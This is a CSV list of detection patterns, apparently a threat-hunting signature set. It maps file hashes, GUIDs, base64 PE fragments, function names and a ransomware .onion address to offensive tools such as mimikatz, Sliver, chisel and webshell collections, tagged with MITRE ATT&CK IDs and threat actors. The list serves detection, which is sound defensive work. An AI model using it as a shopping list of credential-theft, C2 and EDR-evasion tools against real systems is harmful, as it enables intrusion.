"*aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d*",".{0,1000}aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","32911"
"*AAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gR*",".{0,1000}AAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gR.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32912"
"*AAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC4Fx3y/HZzofx2c6H8dnOh4iTgof52c6GTANih+XZzoefr7aHvdnOh9Q7gofl2c6H8dnKhoHZzoefr2aGVdnO*",".{0,1000}AAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC4Fx3y\/HZzofx2c6H8dnOh4iTgof52c6GTANih\+XZzoefr7aHvdnOh9Q7gofl2c6H8dnKhoHZzoefr2aGVdnO.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32913"
"*AAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACp8yO07ZJN5+2STeftkk3n88De5++STeeC5Obn6JJN5/YP5ufFkk3n9g/n54ySTef2D9Pn55JN5+Tq3ufokk3*",".{0,1000}AAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACp8yO07ZJN5\+2STeftkk3n88De5\+\+STeeC5Obn6JJN5\/YP5ufFkk3n9g\/n54ySTef2D9Pn55JN5\+Tq3ufokk3.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32914"
"*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*",".{0,1000}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","32915"
"*AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw==*",".{0,1000}AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw\=\=.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","32916"
"*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*",".{0,1000}AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","32917"
"*aaad2f2baf694d48d712e346588654b34efc098d6443114600dc45621aa590b2*",".{0,1000}aaad2f2baf694d48d712e346588654b34efc098d6443114600dc45621aa590b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32918"
"*aab2975ed85ae44e318e705da1bd5d80ebd150affe9d11144473452cf919e928*",".{0,1000}aab2975ed85ae44e318e705da1bd5d80ebd150affe9d11144473452cf919e928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32921"
"*AAB4D641-C310-4572-A9C2-6D12593AB28E*",".{0,1000}AAB4D641\-C310\-4572\-A9C2\-6D12593AB28E.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","#GUIDproject","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","32923"
"*aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b*",".{0,1000}aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32924"
"*AAB75969-92BA-4632-9F78-AF52FA2BCE1E*",".{0,1000}AAB75969\-92BA\-4632\-9F78\-AF52FA2BCE1E.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#GUIDproject","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","32925"
"*aab9002fa530e777ab0dac8b5aa470d6733f1d54d2316c58db6e244726b5cf19*",".{0,1000}aab9002fa530e777ab0dac8b5aa470d6733f1d54d2316c58db6e244726b5cf19.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32926"
"*aac934f5656f3d2f861a4e0ccaa83175bb2fa9f5b8d893192ec287f2097bf18a*",".{0,1000}aac934f5656f3d2f861a4e0ccaa83175bb2fa9f5b8d893192ec287f2097bf18a.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32928"
"*aacf6ed6e4b999a6338d5a025350ea5a*",".{0,1000}aacf6ed6e4b999a6338d5a025350ea5a.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","32931"
"*aad7684c2412f03604be79ddb5ac0884105ced7459eb94fa0da6a7910648b3b1*",".{0,1000}aad7684c2412f03604be79ddb5ac0884105ced7459eb94fa0da6a7910648b3b1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32932"
"*AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy*",".{0,1000}AAEAAAD\/\/\/\/\/AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","32939"
"*aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669*",".{0,1000}aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32940"
"*aaed9c124d3a6fb221a85b554f6b71dfa58e64838e33454efd59b91675818a38*",".{0,1000}aaed9c124d3a6fb221a85b554f6b71dfa58e64838e33454efd59b91675818a38.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32941"
"*aaee8c23fcc20569816c9f29b25df968cddf3836e80f2ff6b509a0caef68ffc5*",".{0,1000}aaee8c23fcc20569816c9f29b25df968cddf3836e80f2ff6b509a0caef68ffc5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32942"
"*aaef424188f507186ba653af6061eeb2308ded4c9f56716239ae667f9ddbd761*",".{0,1000}aaef424188f507186ba653af6061eeb2308ded4c9f56716239ae667f9ddbd761.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32943"
"*aaf31c321bb2d6df18c0a0ed426388fed0ab27feaab35de388cbbf8f6ae25727*",".{0,1000}aaf31c321bb2d6df18c0a0ed426388fed0ab27feaab35de388cbbf8f6ae25727.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32945"
"*aafc409ee997c45ec84a4c5db029046b1b2a5dc88d6d3f720fcce26085378e74*",".{0,1000}aafc409ee997c45ec84a4c5db029046b1b2a5dc88d6d3f720fcce26085378e74.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32947"
"*aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e*",".{0,1000}aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32949"
"*aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e*",".{0,1000}aafdc7daa6d0f982d64819a332aebc9576b166c78c38a16b065274e8c5dc518e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32950"
"*aaff9defdd75eb977d2b48f3dfca82641c91a243f04ca99975034880e2170b28*",".{0,1000}aaff9defdd75eb977d2b48f3dfca82641c91a243f04ca99975034880e2170b28.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32951"
"*AAP-AddToHighPrivilegePrincipalMap*",".{0,1000}AAP\-AddToHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32953"
"*AAP-CheckIfMemberOfPrivilegedDirectoryRole*",".{0,1000}AAP\-CheckIfMemberOfPrivilegedDirectoryRole.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32954"
"*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*",".{0,1000}AAP\-DisplayApplicableMFAConditionalAccessPolicyForUserID.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32955"
"*AAP-DisplayHighPrivilegePrincipalMap*",".{0,1000}AAP\-DisplayHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32956"
"*AAP-DisplayNonHighPrivilegedRoleAssignments*",".{0,1000}AAP\-DisplayNonHighPrivilegedRoleAssignments.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32957"
"*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*",".{0,1000}AAP\-GetHighPrivilegedDirectoryRoleTemplateMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","32958"
"*aardwolf.extensions.RDPEDYC.vchannels.socksoverrdp import SocksOverRDPChannel*",".{0,1000}aardwolf\.extensions\.RDPEDYC\.vchannels\.socksoverrdp\simport\sSocksOverRDPChannel.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","32959"
"*aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion*",".{0,1000}aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","32960"
"*ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665*",".{0,1000}ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32961"
"*ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97*",".{0,1000}ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32963"
"*ab0ee603e53cd0b32f09a0c53469d09281002a783d8aa5fcea1110ef2b57df81*",".{0,1000}ab0ee603e53cd0b32f09a0c53469d09281002a783d8aa5fcea1110ef2b57df81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32964"
"*ab18ba41a3ac4e39a62403d4c926969bf73df5e364c290c87508c006df13e9a8*",".{0,1000}ab18ba41a3ac4e39a62403d4c926969bf73df5e364c290c87508c006df13e9a8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32965"
"*ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b*",".{0,1000}ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","#filehash","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","32966"
"*ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4*",".{0,1000}ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32968"
"*ab2b75389dc3ffb194e335af335d6ba22abbc0e56815eb4f5fd7afa9ed9e72ac*",".{0,1000}ab2b75389dc3ffb194e335af335d6ba22abbc0e56815eb4f5fd7afa9ed9e72ac.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32969"
"*ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1*",".{0,1000}ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32970"
"*ab2c849ba04bc802e0036244364ca131377aaa5311771331b64ebb1b02abc4d8*",".{0,1000}ab2c849ba04bc802e0036244364ca131377aaa5311771331b64ebb1b02abc4d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32971"
"*AB2E1440-7EC2-45A2-8CF3-2975DE8A57AD*",".{0,1000}AB2E1440\-7EC2\-45A2\-8CF3\-2975DE8A57AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32972"
